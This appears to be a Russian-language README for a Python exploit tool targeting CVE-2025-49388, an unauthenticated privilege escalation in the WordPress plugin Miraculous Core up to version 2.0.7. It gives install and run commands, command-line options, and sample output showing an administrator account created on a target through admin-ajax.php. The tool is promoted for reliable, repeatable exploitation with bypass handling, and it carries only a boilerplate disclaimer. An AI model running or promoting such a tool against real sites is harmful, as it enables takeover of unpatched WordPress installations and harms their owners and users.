
Miraculous Core (kamleshyadav) ≤ 2.0.7 — Неаутентифицированное повышение привилегий
Плагин WordPress Miraculous Core версии <= 2.0.7 уязвим к повышению привилегий
Уязвимость неправильного назначения привилегий в плагине kamleshyadav Miraculous Core позволяет неавторизованным атакующим повышать привилегии и регистрировать учётные записи администраторов.
Затронутые версии: с n/a по 2.0.7
Patchstack CNA CVSS 3.1:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:HNIST CVSS: (оценка ещё не предоставлена)
Этот скрипт на Python автоматизирует эксплуатацию CVE-2025-49388, регистрируя новую учётную запись администратора на уязвимых установках WordPress с установленным плагином Miraculous Core.
Он обеспечивает высокую надёжность, рандомизирует данные для многократной надёжной эксплуатации и автоматически обрабатывает заголовки, куки и попытки обхода.
Установка зависимостей:
pip install requests colorama
python CVE-2025-49388.py -u <target-url> [ОПЦИИ]
Пример:
python CVE-2025-49388.py -u http://127.0.0.1/wordpress
Примечание:
Если вы опустите имя пользователя или email, при каждом запуске будут генерироваться случайные значения, чтобы избежать ошибок дублирования.
[Nxploited INFO] Цель: http://target/wp-admin/admin-ajax.php
[Nxploited INFO] Начало попытки эксплуатации...
[Nxploited SUCCESS] Эксплуатация успешна! Nxploited от Nxploited
[Nxploited УЧЁТНЫЕ ДАННЫЕ]
Имя пользователя : Nxploited_4pQz1x
Пароль : Str0ng!Pass123
Email : [email protected]
Этот инструмент предоставляется только для образовательных целей и авторизованного тестирования безопасности.
Несанкционированная эксплуатация систем без явного разрешения незаконна и неэтична.
Автор не несёт ответственности за неправомерное использование или нанесённый ущерб. Используйте ответственно.
| Опция | Описание | Пример |
|---|
-u, --url | Целевой URL WordPress (обязательно) | -u http://target.com/wordpress |
-un, --username | Желаемое имя пользователя (по умолчанию: случайное) | -un admin1337 |
-fn, --full_name | Полное имя (по умолчанию: Nxploited) | -fn "Иван Петров" |
-em, --useremail | Email (по умолчанию: случайный) | -em [email protected] |
-pw, --password | Пароль (по умолчанию: Str0ng!Pass123) | -pw MySecretPass! |
-o, --output | Сохранить результаты в файл | -o result.txt |